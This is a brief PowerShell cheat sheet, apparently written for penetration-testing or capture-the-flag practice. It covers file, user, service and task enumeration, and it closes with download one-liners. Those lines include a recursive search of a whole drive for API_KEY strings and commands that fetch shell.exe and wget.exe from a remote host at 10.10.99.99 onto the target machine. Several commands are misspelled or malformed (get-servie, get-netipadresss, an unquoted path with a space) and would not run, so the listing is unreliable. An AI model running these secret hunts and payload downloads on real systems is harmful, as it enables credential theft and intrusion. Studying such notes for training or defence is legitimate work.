PowerShell

Search command

Get-command get-*ip*

List files

Get-Childitem -Path C:\

File search

Get-Childitem -Path C:\ -Recurse -force -Include *.txt
Get-Childitem -Path C:\ -Recurse -force -ErrorAction SilentlyContinue -Include *interesting-file.txt*
Get-Childitem -Path C:\ -Recurse -force -ErrorAction SilentlyContinue -Filter *interesting-file.txt*

Get-ChildItem -Path C:\ -Include *.bak* -File -Recurse -ErrorAction SilentlyContinue

Read file

more interesting-file.txt

Search by content

Get-ChildItem C:\* -Recurse | Select-String -pattern API_KEY

Show services

get-servie
get-servie | where-object -property status -eq running
get-servie | where-object -property status -eq stopped

Current working directory

get-location

Check if file exist

test-path c:/program files/interesting-files.txt

Get list of users

get-localusers

Get list of user with details

get-localuser | select *

Get details of user

get-localuser -name Administrator | select *

List local groups

get-localgroups

Get IP address

get-netipadresss

Get all process

get-process

List scheduled tasks

get-scheduledtask

Get owner of

get-acl c:

File Transfers

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.99.99/wget.exe','C:\Users\jac\Desktop\wget.exe')"

powershell -c "Invoke-WebRequest -Uri 'http://10.10.99.99:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"